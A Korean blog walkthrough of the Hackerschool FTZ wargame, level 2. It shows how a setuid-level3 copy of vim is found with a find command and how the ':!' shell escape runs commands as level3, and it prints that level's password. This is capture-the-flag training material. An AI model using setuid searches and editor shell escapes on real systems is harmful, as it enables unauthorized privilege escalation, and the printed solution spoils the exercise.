FTZ_level2
[level2@ftz level2]$ ls hint public_html tmp [level2@ftz level2]$ cat hint 텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데… |
level1에서 사용했던 방법으로 level3 setuid 권한이 걸린 파일을 찾아보겠습니다.
[level2@ftz level2]$ find / -user level3 -perm +6000 2>/dev/null /usr/bin/editor [level2@ftz level2]$ ls -l /usr/bin/editor -rwsr-x--- 1 level3 level2 11651 6월 5 08:44 /usr/bin/editor |
실행시켜보면.. vim 편집기가 실행되는것을 확인할 수 있습니다.
hint의 내용을 참고하면..
vim편집기의 기능중 셸 명령을 실행하는 기능을 사용하면 되겠군요!
바로 “:! + 명령어” 를 사용하면 됩니다.
:! id , :! my-pass 를 입력해 확인해보면..
uid=3003(level3) gid=3002(level2) groups=3002(level2)
Hit ENTER or type command to continue
Level3 Password is "can you fly?".
shell returned 37
Hit ENTER or type command to continue
|
level3의 패스워드가 보이네요ㅎㅎ
'System Hacking > 해커스쿨 FTZ' 카테고리의 다른 글
| 해커스쿨 FTZ ( level5 -> level6 ) 2 by ORANG (0) | 2014.10.20 |
|---|---|
| 해커스쿨 FTZ ( level5 -> level6 ) 1 by ORANG (0) | 2014.10.20 |
| 해커스쿨 FTZ ( level4 -> level5 ) by ORANG (0) | 2014.10.20 |
| 해커스쿨 FTZ ( level3 -> level4 ) by ORANG (0) | 2014.10.20 |
| 해커스쿨 FTZ ( level1 -> level2 ) by ORANG (0) | 2014.10.20 |